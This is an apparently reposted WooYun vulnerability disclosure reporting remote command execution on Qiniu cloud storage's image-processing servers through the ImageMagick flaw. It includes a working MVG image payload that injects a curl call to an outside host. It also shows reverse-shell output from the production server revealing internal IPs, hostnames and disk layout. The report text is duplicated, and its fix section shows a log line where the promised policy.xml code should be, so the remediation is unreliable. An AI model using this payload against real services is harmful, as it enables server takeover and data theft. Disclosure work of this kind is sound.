七牛云存储远程命令执行漏洞影响图片处理服务器

2017年4月30日08:13:53评论384 views字数 226阅读0分45秒阅读模式

摘要

2016-05-05：细节已通知厂商并且等待厂商处理中
2016-05-05：厂商已经确认，细节仅向厂商公开
2016-05-15：细节向核心白帽子及相关领域专家公开
2016-05-25：细节向普通白帽子公开
2016-06-04：细节向实习白帽子公开
2016-06-19：细节向公众公开

漏洞概要关注数(46) 关注此漏洞

缺陷编号： WooYun-2016-205290

漏洞标题：七牛云存储远程命令执行漏洞影响图片处理服务器

漏洞作者：风吹屁屁好特么凉

提交时间： 2016-05-05 14:28

公开时间： 2016-06-19 16:20

漏洞类型：命令执行

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程命令执行第三方不可信程序补丁不及时

8人收藏

漏洞详情

披露状态：

简要描述：

七牛云存储远程命令执行漏洞影响图片处理服务器

详细说明：

七牛云存储在业务中使用了 ImageMagick 对程序进行处理，由于该软件（扩展）存在命令执行漏洞，所以导致可以直接获取七牛云存储服务器权限。

漏洞详情请参考：

http://www.openwall.com/lists/oss-security/2016/05/03/18

具体利用过程：调用七牛云存储上传图片，图片内容为：

code 区域

push graphic-context
 viewbox 0 0 640 480
 fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)'
 pop graphic-context

我的服务器 web 日志能够收到如下请求：

code 区域

183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

证明服务器能够执行命令，反弹 shell 到本地：

code 区域

:/home/qboxserver$ /sbin/ifconfig 
 /sbin/ifconfig
 bond0     Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
           inet addr:192.168.39.56  Bcast:192.168.39.255  Mask:255.255.255.0
           inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link
           UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
           RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139
           TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:2185589994172355 (2.1 PB)  TX bytes:2267435507197833 (2.2 PB)
 
 eth0      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
           UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
           RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139
           TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:1137441591036452 (1.1 PB)  TX bytes:1174420660158860 (1.1 PB)
           Memory:df7a0000-df7c0000 
 
 eth2      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
           UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
           RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0
           TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:1048148403135903 (1.0 PB)  TX bytes:1093014847038820 (1.0 PB)
           Memory:df920000-df940000 
 
 lo        Link encap:Local Loopback  
           inet addr:127.0.0.1  Mask:255.0.0.0
           inet6 addr: ::1/128 Scope:Host
           UP LOOPBACK RUNNING  MTU:16436  Metric:1
           RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0
           TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:271458766242099 (271.4 TB)  TX bytes:271458766242099 (271.4 TB)
 
 :/home/qboxserver$

code 区域

:/home/qboxserver$ cat /etc/hosts
 cat /etc/hosts
 127.0.0.1               localhost               nb443
 ::1             ip6-localhost           ip6-loopback
 fe00::0         ip6-localnet
 ff00::0         ip6-mcastprefix
 ff02::1         ip6-allnodes
 ff02::2         ip6-allrouters
 192.168.1.188           salt            puppetmaster
 192.168.33.200          zabbixserver            bosunserver             fileserver.qbox.me
 192.168.34.129          nb.fileserver.qbox.me
 192.168.48.248          ntp.ubuntu.com
 
 172.16.77.202 qmaster2
 
 
 172.16.77.201 qmaster1
 
 172.16.77.201 qmaster1
 172.16.77.202 qmaster2

code 区域

:/home/qboxserver$ df -h
 df -h
 Filesystem      Size  Used Avail Use% Mounted on
 /dev/sda5       279G   75G  190G  29% /
 udev             16G   12K   16G   1% /dev
 tmpfs           6.3G  392K  6.3G   1% /run
 none            5.0M     0  5.0M   0% /run/lock
 none             16G   60K   16G   1% /run/shm
 /dev/sde1       3.7T  3.2T  293G  92% /disk1
 /dev/sdc1       3.7T  3.3T  220G  94% /disk2
 /dev/sdb1       3.7T  3.3T  254G  93% /disk3
 /dev/sdd1       3.7T  3.2T  283G  93% /disk4
 /dev/sdg1       3.7T  3.3T  203G  95% /disk5
 /dev/sdi1       3.7T  3.2T  278G  93% /disk6
 /dev/sdh1       3.7T  3.2T  285G  92% /disk7
 /dev/sdj1       3.7T  3.3T  245G  94% /disk8
 /dev/sdk1       3.7T  3.2T  301G  92% /disk9
 /dev/sdl1       3.7T  3.2T  262G  93% /disk10
 /dev/sdm1       3.7T  3.3T  256G  93% /disk11
 /dev/sdf1       3.7T   56G  3.4T   2% /disk12

挂载了这么多磁盘，有将近 40T 的数据，猜测都是客户上传的静态资源。

漏洞证明：

七牛云存储在业务中使用了 ImageMagick 对程序进行处理，由于该软件（扩展）存在命令执行漏洞，所以导致可以直接获取七牛云存储服务器权限。

漏洞详情请参考：

http://www.openwall.com/lists/oss-security/2016/05/03/18

具体利用过程：调用七牛云存储上传图片，图片内容为：

code 区域

push graphic-context
 viewbox 0 0 640 480
 fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)'
 pop graphic-context

我的服务器 web 日志能够收到如下请求：

code 区域

183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

证明服务器能够执行命令，反弹 shell 到本地：

code 区域

:/home/qboxserver$ /sbin/ifconfig 
 /sbin/ifconfig
 bond0     Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
           inet addr:192.168.39.56  Bcast:192.168.39.255  Mask:255.255.255.0
           inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link
           UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
           RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139
           TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:2185589994172355 (2.1 PB)  TX bytes:2267435507197833 (2.2 PB)
 
 eth0      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
           UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
           RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139
           TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:1137441591036452 (1.1 PB)  TX bytes:1174420660158860 (1.1 PB)
           Memory:df7a0000-df7c0000 
 
 eth2      Link encap:Ethernet  HWaddr 6c:92:bf:08:42:31  
           UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
           RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0
           TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:1048148403135903 (1.0 PB)  TX bytes:1093014847038820 (1.0 PB)
           Memory:df920000-df940000 
 
 lo        Link encap:Local Loopback  
           inet addr:127.0.0.1  Mask:255.0.0.0
           inet6 addr: ::1/128 Scope:Host
           UP LOOPBACK RUNNING  MTU:16436  Metric:1
           RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0
           TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:271458766242099 (271.4 TB)  TX bytes:271458766242099 (271.4 TB)
 
 :/home/qboxserver$

code 区域

:/home/qboxserver$ cat /etc/hosts
 cat /etc/hosts
 127.0.0.1               localhost               nb443
 ::1             ip6-localhost           ip6-loopback
 fe00::0         ip6-localnet
 ff00::0         ip6-mcastprefix
 ff02::1         ip6-allnodes
 ff02::2         ip6-allrouters
 192.168.1.188           salt            puppetmaster
 192.168.33.200          zabbixserver            bosunserver             fileserver.qbox.me
 192.168.34.129          nb.fileserver.qbox.me
 192.168.48.248          ntp.ubuntu.com
 
 172.16.77.202 qmaster2
 
 
 172.16.77.201 qmaster1
 
 172.16.77.201 qmaster1
 172.16.77.202 qmaster2

code 区域

:/home/qboxserver$ df -h
 df -h
 Filesystem      Size  Used Avail Use% Mounted on
 /dev/sda5       279G   75G  190G  29% /
 udev             16G   12K   16G   1% /dev
 tmpfs           6.3G  392K  6.3G   1% /run
 none            5.0M     0  5.0M   0% /run/lock
 none             16G   60K   16G   1% /run/shm
 /dev/sde1       3.7T  3.2T  293G  92% /disk1
 /dev/sdc1       3.7T  3.3T  220G  94% /disk2
 /dev/sdb1       3.7T  3.3T  254G  93% /disk3
 /dev/sdd1       3.7T  3.2T  283G  93% /disk4
 /dev/sdg1       3.7T  3.3T  203G  95% /disk5
 /dev/sdi1       3.7T  3.2T  278G  93% /disk6
 /dev/sdh1       3.7T  3.2T  285G  92% /disk7
 /dev/sdj1       3.7T  3.3T  245G  94% /disk8
 /dev/sdk1       3.7T  3.2T  301G  92% /disk9
 /dev/sdl1       3.7T  3.2T  262G  93% /disk10
 /dev/sdm1       3.7T  3.3T  256G  93% /disk11
 /dev/sdf1       3.7T   56G  3.4T   2% /disk12

挂载了这么多磁盘，有将近 40T 的数据，猜测都是客户上传的静态资源。

修复方案：

使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加如下代码：

code 区域

183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"

版权声明：转载请注明来源风吹屁屁好特么凉@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-05-05 16:19

厂商回复：

感谢您的提示，我们正在修复。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-05 17:26 | 七牛云存储(乌云厂商)

3

为表感谢，我们申请了一台iPhone6s，请联系我们领取。

1# 回复此人
2016-05-05 17:30 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)

0

@七牛云存储这么壕。。

2# 回复此人
2016-05-05 17:31 | Hax0rs ( 实习白帽子 | Rank:65 漏洞数:13 | Hax0rs)

0

土豪厂商

3# 回复此人
2016-05-05 17:35 | 光棍节 ( 普通白帽子 | Rank:148 漏洞数:59 | 光棍节)

0

土豪厂商

4# 回复此人
2016-05-05 17:35 | 红客十年 ( 普通白帽子 | Rank:392 漏洞数:80 | 去年离职富士康，回到家中上蓝翔，蓝翔毕业...)

0

土豪厂商

5# 回复此人
2016-05-05 17:37 | 专业种田 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

0

已私信地址

6# 回复此人
2016-05-05 17:37 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)

0

已私信地址

7# 回复此人
2016-05-05 17:37 | JiuShao ( 普通白帽子 | Rank:495 漏洞数:109 | ╮(╯▽╰)╭锄禾日当午)

0

土豪厂商

8# 回复此人
2016-05-05 17:41 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

0

可怕

9# 回复此人
2016-05-05 17:45 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

0

土豪！

10# 回复此人
2016-05-05 17:46 | 包包不是包 ( 路人 | Rank:9 漏洞数:5 | 逛了集市,有目标了,刷个iPhone7s Plus 出来)

0

已私信地址

11# 回复此人
2016-05-05 18:19 | Praise ( 路人 | Rank:10 漏洞数:1 | null 开心就要笑得如痴如醉~)

0

- - 阿里动作很快, 邮件通知了。

12# 回复此人
2016-05-05 18:33 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

0

确定是真送？

13# 回复此人
2016-05-05 19:06 | 中国Cold ( 实习白帽子 | Rank:57 漏洞数:24 | 服重任,行远道,正直而固者,轴也。)

0

土豪厂商

14# 回复此人
2016-05-05 21:51 | jye33 ( 普通白帽子 | Rank:1340 漏洞数:310 | 没有什么能够阻挡，我对静静的向往)

0

已私信地址

15# 回复此人

漏洞概要 关注数(46) 关注此漏洞

缺陷编号： WooYun-2016-205290

漏洞标题： 七牛云存储远程命令执行漏洞影响图片处理服务器

相关厂商： 七牛云存储

漏洞作者： 风吹屁屁好特么凉

提交时间： 2016-05-05 14:28

公开时间： 2016-06-19 16:20

漏洞类型： 命令执行

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 远程命令执行 第三方不可信程序 补丁不及时

8人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 风吹屁屁好特么凉@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(46) 关注此漏洞

漏洞标题：七牛云存储远程命令执行漏洞影响图片处理服务器

相关厂商：七牛云存储

漏洞作者：风吹屁屁好特么凉

漏洞类型：命令执行

危害等级：高

漏洞状态：厂商已经确认

Tags标签：远程命令执行第三方不可信程序补丁不及时

版权声明：转载请注明来源风吹屁屁好特么凉@乌云

漏洞评价(共0人评价):

登陆后才能进行评分